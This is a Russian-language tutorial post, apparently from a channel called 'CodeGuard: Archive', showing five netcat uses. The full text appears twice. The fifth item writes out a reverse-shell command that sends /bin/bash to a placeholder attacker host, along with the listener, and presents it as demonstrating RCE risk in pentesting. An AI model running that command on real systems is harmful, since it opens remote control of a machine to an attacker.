netcat: одна утилита, которая умеет всё
Сегодня разбираем инструмент, который появился в 1995 году и до сих пор стоит в арсенале каждого админа и пентестера. Netcat — «швейцарский нож TCP/IP». Одна команда — и ты можешь слушать порты, передавать файлы, сканировать сети и даже получить shell.
Что это
nc (или netcat) — утилита для работы с TCP и UDP. Она читает и пишет данные через сетевые соединения. Не имеет встроенного шифрования, не умеет в HTTP — но именно поэтому универсальна.
5 вещей, которые я делаю через netcat
1. Проверить, открыт ли порт
bash
nc -zv 192.168.1.1 22
Результат: Connection to 192.168.1.1 22 port [tcp/ssh] succeeded! Если порт закрыт — Connection refused.
Это быстрее, чем nmap, когда нужно проверить один порт.
2. Передать файл между машинами
На приёмнике:
nc -l -p 4444 > received_file
На отправителе:
nc 192.168.1.2 4444 < file_to_send
Файл ушёл. Без SCP, без FTP, без настройки. Если машины в одной сети — работает за секунды.
3. Слушать трафик на порту
nc -l -p 8080
Теперь всё, что приходит на порт 8080, выводится в терминал. Удобно для отладки: клиент стучится — ты видишь запрос.
4. Простой чат между двумя машинами
На первой:
nc -l -p 4444
На второй:
nc 192.168.1.2 4444
Пишешь текст — он появляется у собеседника. Небезопасно, но для быстрой связи в локальной сети работает.
5. Получить shell (если сервер уязвим)
Это классика пентеста. Если на сервере есть RCE, атакующий может запустить:
nc -e /bin/bash attacker_ip 4444
Тогда на машине атакующего:
nc -lvnp 4444
И он получает shell. Именно поэтому nc часто называют «backdoor в одну строку». В легальном пентесте это демонстрирует опасность RCE.
😈 CodeGuard: Archive
Сегодня разбираем инструмент, который появился в 1995 году и до сих пор стоит в арсенале каждого админа и пентестера. Netcat — «швейцарский нож TCP/IP». Одна команда — и ты можешь слушать порты, передавать файлы, сканировать сети и даже получить shell.
Что это
nc (или netcat) — утилита для работы с TCP и UDP. Она читает и пишет данные через сетевые соединения. Не имеет встроенного шифрования, не умеет в HTTP — но именно поэтому универсальна.
5 вещей, которые я делаю через netcat
1. Проверить, открыт ли порт
bash
nc -zv 192.168.1.1 22
Результат: Connection to 192.168.1.1 22 port [tcp/ssh] succeeded! Если порт закрыт — Connection refused.
Это быстрее, чем nmap, когда нужно проверить один порт.
2. Передать файл между машинами
На приёмнике:
nc -l -p 4444 > received_file
На отправителе:
nc 192.168.1.2 4444 < file_to_send
Файл ушёл. Без SCP, без FTP, без настройки. Если машины в одной сети — работает за секунды.
3. Слушать трафик на порту
nc -l -p 8080
Теперь всё, что приходит на порт 8080, выводится в терминал. Удобно для отладки: клиент стучится — ты видишь запрос.
4. Простой чат между двумя машинами
На первой:
nc -l -p 4444
На второй:
nc 192.168.1.2 4444
Пишешь текст — он появляется у собеседника. Небезопасно, но для быстрой связи в локальной сети работает.
5. Получить shell (если сервер уязвим)
Это классика пентеста. Если на сервере есть RCE, атакующий может запустить:
nc -e /bin/bash attacker_ip 4444
Тогда на машине атакующего:
nc -lvnp 4444
И он получает shell. Именно поэтому nc часто называют «backdoor в одну строку». В легальном пентесте это демонстрирует опасность RCE.
😈 CodeGuard: Archive